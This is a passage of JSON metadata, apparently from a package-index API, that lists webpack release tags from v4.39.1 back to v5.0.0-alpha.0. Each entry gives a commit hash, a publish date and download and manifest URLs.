v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/